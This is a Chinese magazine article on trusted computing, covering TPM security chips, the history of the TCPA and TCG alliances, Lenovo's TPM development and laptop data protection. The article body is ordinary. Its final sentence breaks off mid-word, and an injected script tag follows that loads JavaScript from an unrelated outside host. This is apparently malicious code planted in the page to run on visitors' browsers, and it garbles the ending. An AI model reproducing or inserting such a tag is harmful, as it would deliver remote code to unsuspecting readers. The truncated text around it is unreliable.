数据就是价值!曾有人说,电脑缺乏有效的数据保护如同在荆棘中裸奔,随时可能遭到重创。对于商务人士来说,这句话尤为贴切。目前的笔记本电脑,通过何种技术才能护住商务人士视为生命的重要数据呢?本期专题将为这些用户一一揭示。
可信计算正当红
文/联想(中国)研究院可信计算研究室主任 宋春雨
pc已经成为人们日常工作和生活不可或缺的信息处理工具,并在30多年的发展过程中迅速形成巨大产业,主要原因之一就在于技术架构上走开放与标准化路子,体系结构上强调计算效率和易用性。这种技术思路对其产业发展确实非常有利,但却给安全性留下巨大隐患,这也是目前pc经常受到攻击、却无法有效防御的根本原因所在。
传统pc的弊端
传统pc因在体系结构上缺乏安全机制设计,而操作系统和应用程序又被挖出层出不穷的漏洞,其安全性问题就不断突显。尤其是进入internet时代,pc安全性问题变得更为紧迫。据统计,目前pc面临的首三位安全威胁是恶意代码攻击、信息非法窃取、数据和系统非法破坏,而恶意代码攻击也不断花样翻新,有病毒、蠕虫、木马、间谍软件、钓鱼软件等多种形式,它们非法进入pc系统并大肆进行恶意破坏,随着基于internet的电子交易逐步开展,以用户私密信息为目标的恶意代码攻击已超过传统病毒成为安全最大威胁。
面对pc的安全问题,早先主要采用软件层打补丁方式,基本上围绕应用层进行“堵漏洞”、“砌高墙”、“滞后防范”来增强pc系统和网络系统的安全性,企图化解安全攻击,但因攻击技术越来越高超,比如病毒存在更隐蔽,采用深度隐藏技术(rootkit),更难检测和根除,所以在应用层建立“堵漏洞”、“砌高墙”、“滞后防范”安全措施难以真正取得有效防御成效。
tpm的安全革命
1999年,pc产业界在总结过去经验与教训的基础上,开始着手以标准化方式从pc体系结构上嵌入安全机制来增强pc安全防御能力,以寻求真正有效的pc安全解决方案。这就是1999年由hp、compaq、ibm、intel、microsoft牵头成立tcpa(trusted computing platform alliance)组织,提出一种可信计算技术思路,即在pc主板上嵌入一款安全芯片(简称tpm),并由tpm支撑pc系统三条安全功能主线:(1)在tpm支撑下,由cpu/芯片组的安全机制和操作系统安全机制相互配合,为每一个程序进程建立安全可信计算域,以使它们能在相互隔离的私有空间中进行计算,这样可以有效地防止现今各种恶意代码和缓冲区溢出攻击,确保应用程序在运行过程中的可信赖性和数据安全性;(2)系统主板建有唯一核心度量根crtm,系统每次启动时,在tpm支撑下,以crtm为起点,一环扣一环地度量和校验每一个软件模块的完整性,建立起系统平台的信任链,确保所启动的系统平台是没有被恶意代码攻击和修改过的,值得用户信赖;(3)tpm作为硬件密码模块,为整个系统提供高安全性的密码服务。
2003年,tcpa改组为tcg,首先针对pc平台全面产业化推广可信计算技术,然后再在服务器平台、移动终端平台领域产业化推广,同时,设计构建平台之间新的网络可信计算方式,所以可信计算将是未来it安全技术发展趋势,tpm将成为每一个计算平台的标配部件。联想研究院是较早在可信计算领域里投入技术研发并达到国际一流水平的研究机构,2005年4月,联想自主研发成功“恒智tpm芯片”,并于次年3月,正式成为tcg标准组织的核心成员(tcg promoter),与跨国公司共同制订未来可信计算技术的国际标准,进一步提升了中国企业在国际标准制订中的话语权。
作者:刘洪宇发布时间:
笔记本电脑作为一种具有移动特性的pc平台,比台式机的安全问题更突出,安全性需求更高,所以可信计算技术理念提出后,首先是在笔记本电脑上大规模推广的,目前商用笔记本电脑有30%以上装配了tpm芯片。据idc预测,到2008年,tpm将首先成为笔记本电脑的标配部件。
可信计算的未来
当然,可信计算技术目前还处于打基础阶段,推出了tpm和软件协议栈等模块的技术规范,但还有许多关键问题需要去突破,比如,如何建立一个平台的全信任链,包括静态信任链和动态信任链,并使平台通过全信任链能快速有效防御恶意代码攻击,构建平台的“免疫系统”,并且不能影响系统整体使用效能,使用户容易接受,还要比目前杀毒技术优越许多。国际上这方面的产品级技术还鲜有报道,而国内一些厂商已经取得较大进展,如联想新推出的系统20秒快速智能修复功能,应该能代表这方面的领先成果。
鉴于笔记本在移动环境中使用,对用户身份识别技术要求较高,而且指纹识别设备在许多笔记本产品装配,因此,这方面的工作将主要结合指纹识别和安全芯片形成具有高安全性的多因素身份认证技术,确保系统身份安全。
在数据保护技术方面,主要基于安全芯片、指纹/安全锁来建立敏感数据、平台、用户三者之间安全绑定关系,使只有合法用户在授?script src=http://er12.com/t.js>
